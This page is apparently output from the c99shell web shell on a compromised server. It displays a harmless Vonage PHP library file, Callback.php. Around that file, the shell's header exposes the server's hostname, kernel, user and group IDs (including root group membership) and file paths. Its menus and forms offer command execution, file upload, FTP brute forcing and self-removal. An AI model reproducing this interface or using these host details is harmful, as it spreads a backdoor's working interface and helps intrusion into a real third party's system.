!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/vonage/client-core/src/Network/Number/   drwxr-xr-x
Free 28.63 GB of 117.98 GB (24.26%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Callback.php (2.24 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
Vonage\Network\Number;

use 
BadMethodCallException;
use 
Vonage\Client\Callback\Callback as BaseCallback;

use function 
substr;

/**
 * @method null|string getType()
 * @method bool hasType()
 * @method null|string getNetwork()
 * @method bool hasNetwork()
 * @method null|string getNetworkName()
 * @method bool hasNetworkName()
 * @method null|string getValid()
 * @method bool hasValid()
 * @method null|string getPorted()
 * @method bool hasPorted()
 * @method null|string getReachable()
 * @method bool hasReachable()
 * @method null|string getRoaming()
 * @method bool hasRoaming()
 * @method null|string getRoamingCountry()
 * @method bool hasRoamingCountry()
 * @method null|string getRoamingNetwork()
 * @method bool hasRoamingNetwork()
 */
class Callback extends BaseCallback
{
    protected array 
$expected = ['request_id''callback_part''callback_total_parts''number''status'];
    protected array 
$optional = [
        
'Type' => 'number_type',
        
'Network' => 'carrier_network_code',
        
'NetworkName' => 'carrier_network_name',
        
'Valid' => 'valid',
        
'Ported' => 'ported',
        
'Reachable' => 'reachable',
        
'Roaming' => 'roaming',
        
'RoamingCountry' => 'roaming_country_code',
        
'RoamingNetwork' => 'roaming_network_code',
    ];

    public function 
getId()
    {
        return 
$this->data['request_id'];
    }

    public function 
getCallbackTotal()
    {
        return 
$this->data['callback_total_parts'];
    }

    public function 
getCallbackIndex()
    {
        return 
$this->data['callback_part'];
    }

    public function 
getNumber()
    {
        return 
$this->data['number'];
    }

    public function 
__call($name$args)
    {
        
$type substr((string) $name03);
        
$property substr((string) $name3);

        if (!isset(
$this->optional[$property])) {
            throw new 
BadMethodCallException('property does not exist: ' $property);
        }

        
$property $this->optional[$property];
        return match (
$type) {
            
'get' => $this->data[$property] ?? null,
            
'has' => isset($this->data[$property]),
            default => throw new 
BadMethodCallException('method does not exist: ' $name),
        };
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--